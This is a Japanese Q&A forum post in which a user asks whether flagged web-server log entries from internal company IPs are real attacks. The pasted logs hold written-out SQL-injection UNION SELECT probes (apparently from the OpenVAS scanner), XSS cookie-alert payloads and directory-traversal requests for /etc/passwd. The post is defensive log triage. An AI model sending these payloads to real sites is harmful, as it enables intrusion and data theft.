お世話になります。
取引先のWEBに不正アクセスについての情報があり、ログをチェックしました。
そのログに社内IPが複数含まれており、不正アクセスと判定されただけなのか、明らかに不正アクセスなのか判断できません。
不正アクセスか否かご判断いただけるようでしたら教えていただけないでしょうか?
まず、判定にはiLogScannerを使いました。
https://www.ipa.go.jp/security/vuln/iLogScanner/
社内IPからのアクセスで不正アクセスと判定されたログの一部です。
SQLインジェクション
"GET /scripts/portfolio_genre.php?id=-67%20union%20select%201,2,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374-- HTTP/1.1" 302 229 A905
"GET /portfolio_genre.php?id=-67%20union%20select%201,2,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374-- HTTP/1.1" 302 229 A905
"GET /software/software-description.php?id=-5%20union%20all%20select%201,2,1234567890987654321,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 HTTP/1.1" 302 229 A905
"GET /cgi-bin/software-description.php?id=-5%20union%20all%20select%201,2,1234567890987654321,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 HTTP/1.1" 404 230 A905
"GET /scripts/software-description.php?id=-5%20union%20all%20select%201,2,1234567890987654321,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 HTTP/1.1" 302 229 A905
"GET /software-description.php?id=-5%20union%20all%20select%201,2,1234567890987654321,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 HTTP/1.1" 302 229 A905
クロスサイトスクリプティング
"GET /cgi-bin/page.php?xPage=<script>alert(document.cookie)</script> HTTP/1.1" 404 214 B958
"GET /guestbook/index.php?start=<script>alert(document.cookie)</script> HTTP/1.1" 302 229 B958
"GET /cgi-bin/index.php?start=<script>alert(document.cookie)</script> HTTP/1.1" 404 215 B958
"GET /scripts/index.php?start=<script>alert(document.cookie)</script> HTTP/1.1" 302 229 B958
"GET /index.php?start=<script>alert(document.cookie)</script> HTTP/1.1" 302 229 B958
ディレクトリトラバーサル
"GET /evision/modules/plain/adminpart/addplain.php?module=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 229 C446
"GET /evision/modules/plain/adminpart/addplain.php?module=../../../javascript/sniffer.js%00 HTTP/1.1" 302 229 C446
"GET /cms/modules/plain/adminpart/addplain.php?module=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 229 C446
"GET /cms/modules/plain/adminpart/addplain.php?module=../../../javascript/sniffer.js%00 HTTP/1.1" 302 229 C446
"GET /cgi-bin/modules/plain/adminpart/addplain.php?module=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 242 C446
"GET /scripts/modules/plain/adminpart/addplain.php?module=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 229 C446
"GET /scripts/modules/plain/adminpart/addplain.php?module=../../../javascript/sniffer.js%00 HTTP/1.1" 302 229 C446
"GET /modules/plain/adminpart/addplain.php?module=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 229 C446
"GET /modules/plain/adminpart/addplain.php?module=../../../javascript/sniffer.js%00 HTTP/1.1" 302 229 C446
宜しくお願いいたします。
回答4件
あなたの回答
tips
プレビュー
バッドをするには、ログインかつ
こちらの条件を満たす必要があります。
退会済みユーザー
2016/06/28 08:48
退会済みユーザー
2016/06/28 09:02